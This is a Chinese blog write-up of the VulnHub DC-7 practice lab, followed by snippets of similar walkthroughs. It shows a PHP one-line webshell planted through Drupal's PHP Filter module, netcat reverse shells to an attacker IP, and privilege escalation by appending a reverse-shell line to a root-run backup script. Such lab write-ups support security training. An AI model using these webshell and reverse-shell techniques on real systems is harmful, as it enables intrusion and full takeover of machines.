vulnhub-dc7

最新推荐文章于 2024-03-14 02:19:26 发布
最新推荐文章于 2024-03-14 02:19:26 发布
阅读量150 收藏
点赞数
分类专栏: 内网 vulhub 文章标签: linux web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/m0_55654781/article/details/127122590
版权

靶机地址

https://www.vulnhub.com/?q=dc-

打开靶机,设置为同一种nat模式

kali 信息收集主机发现

arp-scan -l

在这里插入图片描述

扫描目标端口发现开启80端口

在这里插入图片描述

访问目标网址,插件wappalyzer,查看到cms为Drupal 8

在这里插入图片描述

搜索@DC7USER,在stuff,中发现config.php文件存在账号密码

https://github.com/Dc7User/staffdb/blob/master/config.php

在这里插入图片描述

在web登录账号密码,发现无法登录,说明不是web端密码,尝试ssh登录成功

在这里插入图片描述

测试发现存在admin账户

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-bQ6mIvgO-1664517869621)(../../../../img/dc7/6.png)]

查看/opt/scripts/backups.sh

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-scj0sKkv-1664517869623)(../../../../img/dc7/7.png)]

进入/var/www/html,执行命令发现修改密码成功

drush user-password admin --password="123456"

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-RtFm17qc-1664517869624)(../../../../img/dc7/8.png)]

登录admin账号,在extend,在install界面,上传文件

https://www.drupal.org/project/php/releases/8.x-1.x-dev

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-AERVgwF6-1664517869625)(../../../../img/dc7/9.png)]

安装成功,点击激活模块,点击前面的三角将前几栏折回,找到PHP Filetr勾选并安装

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-jWAS5cMu-1664517869627)(../../../../img/dc7/10.png)]

安装完毕,点击content,add content,basic page,更改语言编写一句话木马,保存查看页面

在这里插入图片描述

<?php eval(@$_POST['bq']); ?>
保存:http://192.168.1.111/node/4

蚁剑连接

在这里插入图片描述

nc开启监听,反弹shell

蚁剑终端:nc -e /bin/sh 192.168.1.162 1234
nc -lvtp 1234
交互模式:python -c 'import pty;pty.spawn("/bin/bash")'

再次开启监听,将反弹shell 写入/opt/scripts/backups.sh脚本反弹shell,并执行

echo "nc -e /bin/bash 192.168.1.162 7894" >> /opt/scripts/backups.sh

进入/opt/scripts,执行backups.sh脚本,提权成功查看flag

请添加图片描述
参考链接

https://blog.youkuaiyun.com/qq_34028816/article/details/124572886

Vulnhub系列之DC7靶场详解
weixin_50053818的博客
05-30 1328
文章目录环境信息收集安装插件拿shell提权 环境 vulhub系列之DC7靶场 VMware虚拟机 kali 信息收集 由目标靶机的MAC地址得到目标IP为192.168.137.103,直接nmap扫描。 可以知道目标开放了80和22端口,直接进入网站。 进入网站发现CMS是drupal 8,在漏洞进行搜索,无果。所以只能查看网站。翻译一下首页的内容。 欢迎来到DC-7 DC-7引入了一些“新”概念,但我将让您弄清楚它们是什么。 ???? 尽管此挑战并不是技术性的全部,但如果您需要诉诸于暴力破
Vulnhub-DC 7-9 提权、端口敲门
2301_80115097的博客
04-28 1221
Vulnhub是一个提供了很多漏洞环境的靶场平台,其中的环境基本上都是做好的虚拟机镜像文件,需要使用VMware或者是VirtualBox运行。每个镜像会有破解的目标,大多是Boot2root,从启动虚拟机到获取操作系统的root权限和查看flag。靶场部署Vulnhub官网:https://www.vulnhub.com下载地址:https://www.vulnhub.com/entry/dc-8,367/直接从官网下载做好的虚拟机镜像文件(我下载的Mirror版本);
Vulnhub-DC-7
KAKA的博客
07-04 449
此次的训练以 Drupal 为主题,并且思考方式不再是单纯的在盒子里,而是要跳出去… 扫描整获取目标 IP :nmap -sn 192.168.67.0/24 扫描目标获取相应信息:nmap -A -p- 192.168.67.242 --> 22 | 80 22 SSH 服务 || 80 HTTP 服务,猜测后面极有可能要用到 SSH 服务…查阅 http://192.168.67.242,CMS 是 Drupal,版本为 8,没有找到关于该版本的相关漏洞利用 初步浏览页面,说是引入了新的概念,需要
VulnHub DC7
baynk的博客
05-21 377
0x00 靶机环境 下载地址1:https://www.vulnhub.com/entry/dc-7,356/ 下载地址2:https://pan.baidu.com/s/1xua7BTO8If5zLua8dQMryA 提取码: dd83 只有一个flag,同时给了提示,不要去使用暴力破解。 这次地址都给了,真好,开肝。 0x02 渗透流程 nmap走起 还是先走80端口 熟悉的界面,好像是dc1使用的Drupal CMS,翻出第一关的页面进行对比 常规思路测试了好一会不一样的地方,逻辑漏洞,搜
Vulnhub DC-7
Pai_Space
03-26 5423
明确:《中华人民共和国网络安全法》 Description DC-7 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. While this isn't an overly technical challenge, it isn't exactly easy. While it's kind of a logic..
VulnHubDC-7
weixin_39219503的博客
02-02 552
01 环境搭建 靶机环境下载:https://www.vulnhub.com/entry/dc-7,356/ 题目信息如下 Description DC-7 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. W...
Vulnhub - DC-1
qq_46081990的博客
03-14 489
Nmap扫描目标主机,发现开放22、80、111、40884端口,分别运行OpenSSH 6.0p1、Apache httpd 2.2.22、rpcbind 2-4服务。MSF搜索Drupal,使用payload:exploit/unix/webapp/drupal_drupalgeddon2,成功拿到Web权限www-data。查询GTFOBins得知find的SUID提权方式如下,启用一个新的root权限的bash。上传综合辅助探测脚本LinEnum.sh至目标主机/tmp目录下,给予执行权限执行。
靶机渗透-Vulnhub-DC-2
dahege666的博客
01-21 411
下载地址: 1、链接:https://pan.baidu.com/s/1cl5-9SrevaFehfS4lY4w5w 提取码:7ahw 2、http://www.five86.com/downloads/DC-2.zip 3、https://download.vulnhub.com/dc/DC-2.zip 靶机:DC2(VMware桥接) IP:192.168.88.123 攻击机:Kali(VMware桥接) IP:192.168..88.109 测试之前需要修改一下hos...
vulnhub-DC系列通关记DC1靶机渗透
qq_35258210的博客
02-07 1800
目录 flag1 信息收集 漏洞利用 后渗透 flag2 flag3 flag4 最终flag 该流程图出于:https://blog.youkuaiyun.com/weixin_44288604/article/details/108027062 本次学习参考于b站千峰机构的网络安全视频:https://www.bilibili.com/video/BV1i7411G7vm?p=268 这张流程图做得很好借来用用。如有侵权请告知删除 flag1 首先我们在启动DC1靶机后进入到系统只显示
靶机实操:vulnhub-DC3
不想当脚本小子的脚本小子
12-06 240
今天继续趁着回家来用DC练练手。照旧先是扫一下内网主机,我一般喜欢先找一下存活的主机然后再查看具体的信息,扫描到IP为192.168.249.135。只开放了80端口 访问网页长这样:发现有一个右下角forget操作,一会看看这里有没有可以操作的地方。CMS是Joomla,中间件会不会存在漏洞? 接下来常规操作。查看robots没东西,那再扫扫后台,挑几个觉得有用的打开看看。总觉得最终的落脚点会在刚才的忘记用户名和密码那里,一会看看会不会被打脸哈哈哈哈 登录界面先简单sql..
vulnhubdc7
qq_54030686的博客
06-16 238
这个靶场本身的难度还可以,主要是它会一直提示你,这种查找源码泄露的方法,在实际中测试中有可能会用到 描述一下整体思路话不多说,操作 主机发现,端口扫描 22端口爆破,未发现弱口令 指纹识别,发现目标为Drupal 8框架 尝试 exploit-db和msf漏洞利用 ![在这里插入图片描述](https://img-blog.csdnimg.cn/3ae9 msf中自带的还是exploit-db上存在的,个人都进行尝试,利用失败 查看界面下方,存在所属厂商 github查找相应资源 在文件的config配置
[Vulnhub] DC-7
weixin_63231007的博客
01-30 386
DC系列靶机-第七弹(git信息泄露&Drupal反弹shell&drush修改Drupal账号密码)
Vulnhub系列--DC7
qq_33775686的博客
05-31 461
知识点: netdiscover nmap droopescan PHP Filter 反弹shell (bin shell 、MSF shell) 提权
vulnhubDC7靶机
LainWith的博客
02-14 1540
目录介绍信息收集主机发现主机信息探测访问网站SSH登录信息收集修改web后台密码挂马提权 介绍 系列: DC(此系列共10台) 发布日期:2019年8月31日 难度:中级 Flag:获取root权限,并拿到唯一的flag 学习: drupal安装php实现挂马 提权 靶机地址:https://www.vulnhub.com/entry/dc-7,356/ 从靶场得到提示信息: 靶机更适用Virtualbox 不要尝试爆破,很难成功 信息收集 主机发现 netdiscover主机发现 对于VulnHu
vulnhub DC7 靶场练习
鸥鹭忘机
08-20 1823
前言 这次练习的靶机是vulnhub平台下的DC系列靶机第7台,下载地址为https://www.vulnhub.com/entry/dc-7,356/。挑战该靶机的最终目的是获取root权限,然后读取唯一的flag。这台靶机中用暴力破解成功的概率非常小,我们需要开阔思路,寻找非技术上的方法。 虚拟机配置 这次采用的网络连接模式依然是NAT模式,为了避免扫描到其他物理主机。在导入虚拟机后,右击DC-6靶机,然后选中配置。依次点击网络配置->NAT模式->高级->生成,然后确认即可。 收集
Vulnhub | DC: 7 |【实战】
bin789456的博客
08-11 1090
靶场链接:DC系列,有些知识点在DC:1中提到,可以翻阅。信息搜集 首先进行存活扫描 在这里插入图片描述 185为攻击目标,61为网关,141为物理机,115为攻击机 端口及服务详情扫描,发现有80和22端口 在这里插入图片描述 先查看一下80端口的网页,指纹非常明显,在DC1也是类似的界面,指纹是Drupal cms 在这里插入图片描述 作者给了一段话 翻译: DC-7引入了一些“新”概念,但我将留给你们去弄清楚它们是什么 虽然这个挑战并不完全是技术性的,但如果你需要诉诸暴力或字典攻击,你可能不会成
Vulnhub靶机:DC-7渗透详细过程
IerkeU的博客
03-20 1183
DC-7 前言提要 这个靶机有用到社工~,还是蛮有趣的 靶场地址:https://www.vulnhub.com/entry/dc-7,356/ DC-7是一个中级的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测试工具使用(Kali / Parrot下的工具) 翻译一下官方给出的一些信息: 这个靶场需要具备中级的渗透测试技巧,这并不是一个很有技术性的挑战,但也不能算容易。渗透测试的和之前的 DC 靶机(哪一台就不知道了)有相似的地方,但会涉及到一些新东西,你的最终目标是放在roo
看完这篇 教你玩转渗透测试靶机vulnhub——DC7
Aluxian_的博客
04-01 6441
Vulnhub靶机DC6渗透测试详解Vulnhub靶机介绍:Vulnhub靶机下载:Vulnhub靶机安装:Vulnhub靶机漏洞详解:①:信息收集: Vulnhub靶机介绍: vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。 靶机DC7 还是老样子只有拿到root权限才可以发现最终的flag。 Vulnhub靶机下载: 官网地址:https://download.vulnhub.com/dc/D
Vulnhub靶机实战——DC-7
冠霖L的博客
10-29 5166
靶机DC-7下载地址:https://download.vulnhub.com/dc/DC-7.zip 环境:VMware 15虚拟机软件 DC-7靶机IP地址:192.168.220.154 Kali的IP地址:192.168.220.155 DC-6靶机与kali都以NAT模式连接到网络,查看kali的IP地址:192.168.220.155...
vulnhub dc-4
最新发布
03-23
### 关于 VulnHub 上的 DC-4 虚拟机镜像 VulnHub 是一个提供各种渗透测试练习环境的平台,其中 DC 系列是非常受欢迎的一组靶场。对于 DC-4 的具体下载和操作指南,虽然当前未有直接提及 DC-4 的引用内容,但可以...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值